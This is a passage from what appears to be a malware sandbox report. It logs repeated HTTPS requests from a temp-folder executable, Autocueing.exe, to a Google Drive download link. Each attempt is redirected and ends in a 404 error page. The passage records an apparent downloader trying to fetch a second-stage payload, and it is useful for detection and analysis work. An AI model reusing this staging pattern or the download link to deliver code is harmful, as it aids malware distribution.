                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:31 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:31 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:31 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-SZEtofncq8YV9J3Fy8Kg5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    27192.168.2.650011142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:32 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:33 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4YvSTyLvi0CHL0tZXnnkol2CqB8On034g77pEMzV8QZoiWHEe3vQ1KsBmFGXOBMP--
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:33 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Qr5xjXmzfhZr6GIhcbLtjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 47 51 39 57 30 4d 43 71 79 49 55 74 78 30 55 56 38 30 63 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fGQ9W0MCqyIUtx0UV80cKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    28192.168.2.650012142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:33 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:34 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:34 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-poLkU90cpkZE6xhI5QqIVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    29192.168.2.650013142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:35 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:35 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSIL3L3et1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDA
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:35 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-4mIxTvIU7EfXXX7pBguplg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 4c 6c 50 77 6b 4a 54 6b 69 6a 57 47 6e 47 35 61 62 77 61 6a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SLlPwkJTkijWGnG5abwajA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    30192.168.2.650015142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:36 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:36 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:36 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-VKHPBfFE8g92vqGGH8PY9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    31192.168.2.650016142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:37 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:37 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSqY9Ex58tWnsi2z_d5zEYnAMyqUZj6HWOrkR5rFGKq2IOoA8_R8u2nzeyJq8GQCDUwkyuRz5w
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:37 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-7YRXiIlHp7-usUVliTPDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 6f 61 35 38 5a 6a 4b 56 36 52 67 6d 5a 39 6a 4f 5f 76 6b 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5oa58ZjKV6RgmZ9jO_vkBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    32192.168.2.650017142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:38 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:39 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:39 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-NGtX2bqOBJZ4aPgNEibcnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    33192.168.2.650018142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
